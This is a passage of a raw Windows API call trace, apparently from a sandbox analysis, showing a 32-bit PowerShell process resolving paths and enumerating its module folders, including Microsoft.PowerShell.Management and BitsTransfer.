lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0149.758] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.758] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0149.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0149.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0149.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0149.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0149.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0149.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0149.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.760] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0149.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0149.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.761] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0149.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0149.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2d0) returned 1 [0149.761] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0e594 | out: lpFileInformation=0x5a0e594*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2cc) returned 1 [0149.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0149.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0149.762] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.764] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.764] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0149.764] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0149.764] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0149.764] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.764] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0149.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.765] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2959b78 | out: lpFileInformation=0x2959b78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0149.765] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.765] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0149.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0149.766] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.766] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.766] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0149.766] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0149.766] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.766] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.766] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0149.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x295a33c | out: lpFileInformation=0x295a33c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0149.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0149.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0149.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0149.768] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x28c [0149.768] GetFileType (hFile=0x28c) returned 0x1 [0149.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0149.768] GetFileType (hFile=0x28c) returned 0x1 [0149.769] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0149.769] ReadFile (in: hFile=0x28c, lpBuffer=0x295b17c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x295b17c*, lpNumberOfBytesRead=0x5a0e4c8*=0x9e9, lpOverlapped=0x0) returned 1 [0149.772] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x9e9 [0149.772] ReadFile (in: hFile=0x28c, lpBuffer=0x295a705, nNumberOfBytesToRead=0x217, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x295a705*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0149.772] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x9e9 [0149.772] ReadFile (in: hFile=0x28c, lpBuffer=0x295b17c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x295b17c*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0149.773] CloseHandle (hObject=0x28c) returned 1 [0149.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e580) returned 1 [0149.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0149.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0149.776] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\*"), lpFindFileData=0x5a0e330 | out: lpFindFileData=0x5a0e330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68e9a0 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37af1c1c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x37af1c1c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x37af1c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, 